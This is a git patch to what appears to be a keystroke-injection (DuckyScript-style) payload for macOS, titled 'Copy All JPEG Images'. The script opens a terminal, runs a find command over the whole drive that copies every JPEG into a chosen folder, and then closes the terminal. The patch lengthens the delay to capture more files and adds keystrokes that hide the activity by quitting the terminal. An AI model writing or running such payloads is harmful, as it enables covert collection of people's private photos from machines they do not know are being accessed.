From 8a6efe6328d1e475ba5bcac070074c83c86cb1af Mon Sep 17 00:00:00 2001 From: Narsty Date: Sun, 14 May 2023 18:01:11 -0500 Subject: [PATCH] Update Copy All JPEG Images .txt --- Executions/Copy All JPEG Images .txt | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Executions/Copy All JPEG Images .txt b/Executions/Copy All JPEG Images .txt index 43cfa2a..b2c06a9 100644 --- a/Executions/Copy All JPEG Images .txt +++ b/Executions/Copy All JPEG Images .txt @@ -2,6 +2,8 @@ REM This script opens the terminal. REM It searches for all JPEG image files located on the entire hard drive. REM It copies the found JPEG images to a folder named "Images" in the destination of your choice. +REM you can adjust the Delay paramater on line 21 to capture more or less + REM Author: Narsty REM Title: Copy All JPEG Images REM Target: MacOS @@ -16,5 +18,7 @@ DELAY 1000 ENTER DELAY 1000 STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \; -DELAY 2000 +DELAY 20000 +CTRL C ENTER +GUI q